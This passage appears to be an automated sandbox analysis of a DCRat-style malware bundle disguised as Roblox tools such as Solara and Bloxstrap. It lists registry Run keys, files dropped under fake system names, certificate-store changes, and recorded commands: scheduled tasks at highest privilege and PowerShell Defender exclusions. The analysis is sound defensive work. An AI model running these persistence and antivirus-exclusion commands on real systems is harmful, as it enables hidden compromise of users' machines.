| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\sddsfsdf = "\"C:\\Users\\Public\\Pictures\\sddsfsdf.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\winNet\\Idle.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\Prefetch\\ReadyBoot\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\msiexec = "\"C:\\MSOCache\\All Users\\msiexec.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Roblox = "\"C:\\DriversavessessionDlldhcp\\Roblox.exe\"" | C:\DriversavessessionDlldhcp\Roblox.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Users\\Default User\\dllhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Default\\conhost.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Users\\Admin\\WmiPrvSE.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\DriversavessessionDlldhcp\\csrss.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\DriversavessessionDlldhcp\\dwm.exe\"" | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\SysWOW64\sv-SE\cmd.exe | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | C:\Windows\SysWOW64\sv-SE\ebf1f9fa8afd6d | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | \??\c:\Windows\System32\CSC9B65422D45F44341A51A8E825BEAE4A.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | \??\c:\Windows\System32\m6dw6b.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2520 set thread context of 2388 | N/A | C:\Windows\System32\conhost.exe | C:\Windows\explorer.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\conhost.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Common Files\Services\6203df4a6bafc7 | C:\winNet\wscript.exe.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | \??\c:\Program Files\Windows Journal\fr-FR\CSCD76AE30457034164B573F4B2A5893960.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\Packages\Debugger\088424020bedd6 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Windows Defender\es-ES\ebf1f9fa8afd6d | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\audiodg.exe | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Adobe\Updater6\smss.exe | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Adobe\Updater6\69ddcba757bf72 | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | \??\c:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Microsoft Office\Office14\1033\5940a34987c991 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Windows Journal\fr-FR\conhost.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Windows Portable Devices\dwm.exe | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\DESIGNER\b75386f1303e64 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | \??\c:\Program Files\Windows Journal\fr-FR\conhost.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | \??\c:\Program Files (x86)\Reference Assemblies\Microsoft\CSCB6ABC6A5FBFC4B328AE5916D92DC1AED.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\DESIGNER\taskhost.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\088424020bedd6 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\42af1c969fbb7b | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File opened for modification | C:\Program Files\Windows Portable Devices\dwm.exe | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | C:\Program Files\Windows Portable Devices\6cb0b6c459d5d3 | C:\winNet\ComContainerbrowserRefRuntime.exe | N/A |
| File created | C:\Program Files\Common Files\Services\lsass.exe | C:\winNet\wscript.exe.exe | N/A |
| File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\services.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files (x86)\Reference Assemblies\Microsoft\c5b4cb5e9653cc | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Windows Journal\fr-FR\088424020bedd6 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Program Files\Windows Defender\es-ES\cmd.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Offline Web Pages\Refcrt.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI58FF.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI59BC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | \??\c:\Windows\Downloaded Program Files\explorer.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | C:\Windows\BitLockerDiscoveryVolumeContents\msiexec.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\Prefetch\ReadyBoot\7a0fd90576e088 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\Offline Web Pages\a0b1fd4c5438e9 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\de-DE\WmiPrvSE.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\Installer\f7753ea.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f7753ea.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Downloaded Program Files\explorer.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\Offline Web Pages\886983d96e3d3e | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\xdwd.dll | C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe | N/A |
| File created | C:\Windows\BitLockerDiscoveryVolumeContents\133006b48fb54b | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\de-DE\24dbde2999530e | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI59AC.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Downloaded Program Files\7a0fd90576e088 | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\Offline Web Pages\csrss.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | \??\c:\Windows\Offline Web Pages\CSCC2D5E9D23B0A48B6BC6FE4B9ECA6CC38.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | \??\c:\Windows\Offline Web Pages\Refcrt.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | \??\c:\Windows\Downloaded Program Files\CSCE0C07C03540D456BB3309258DBDFE59B.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | C:\Windows\diagnostics\system\DeviceCenter\es-ES\Refcrt.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
| File created | C:\Windows\Prefetch\ReadyBoot\explorer.exe | C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob | C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob | C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\csrss.exe | N/A |
| N/A | N/A | C:\Users\All Users\Microsoft\IdentityCRL\audiodg.exe | N/A |
| N/A | N/A | C:\winNet\wscript.exe.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\Youtube.exe
"C:\Users\Admin\AppData\Local\Temp\Youtube.exe"
C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe
"C:\Users\Admin\AppData\Local\Temp\sddsfsdf.exe"
C:\Users\Admin\AppData\Local\Temp\Result.exe
"C:\Users\Admin\AppData\Local\Temp\Result.exe"
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe
"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"
C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe
"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"
C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe
"C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe"
C:\Users\Admin\AppData\Local\Temp\Frage build.exe
"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"
C:\Users\Admin\AppData\Local\Temp\solara.exe
"C:\Users\Admin\AppData\Local\Temp\solara.exe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe
"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 7 /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 12 /tr "'C:\DriversavessessionDlldhcp\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 8 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 8 /tr "'C:\Windows\Offline Web Pages\Refcrt.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\Refcrt.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 9 /tr "'C:\Windows\Offline Web Pages\Refcrt.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 9 /tr "'C:\winNet\Bloxstrap.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 10 /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Users\All Users\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Users\All Users\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 6 /tr "'C:\winNet\lsm.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsm" /sc ONLOGON /tr "'C:\winNet\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsml" /sc MINUTE /mo 9 /tr "'C:\winNet\lsm.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 10 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 8 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 9 /tr "'C:\winNet\wscript.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\winNet\wscript.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\winNet\wscript.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\csrss.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\DriversavessessionDlldhcp\csrss.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Windows\de-DE\WmiPrvSE.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\de-DE\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 6 /tr "'C:\Windows\de-DE\WmiPrvSE.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\lsass.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\conhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Offline Web Pages\Refcrt.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\Office14\1033\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\Bloxstrap.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\lsm.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\lsass.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\wscript.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\2b7a8ca2-3d6d-11ef-81ce-f2a3cf4ad94f\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\DriversavessessionDlldhcp\csrss.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
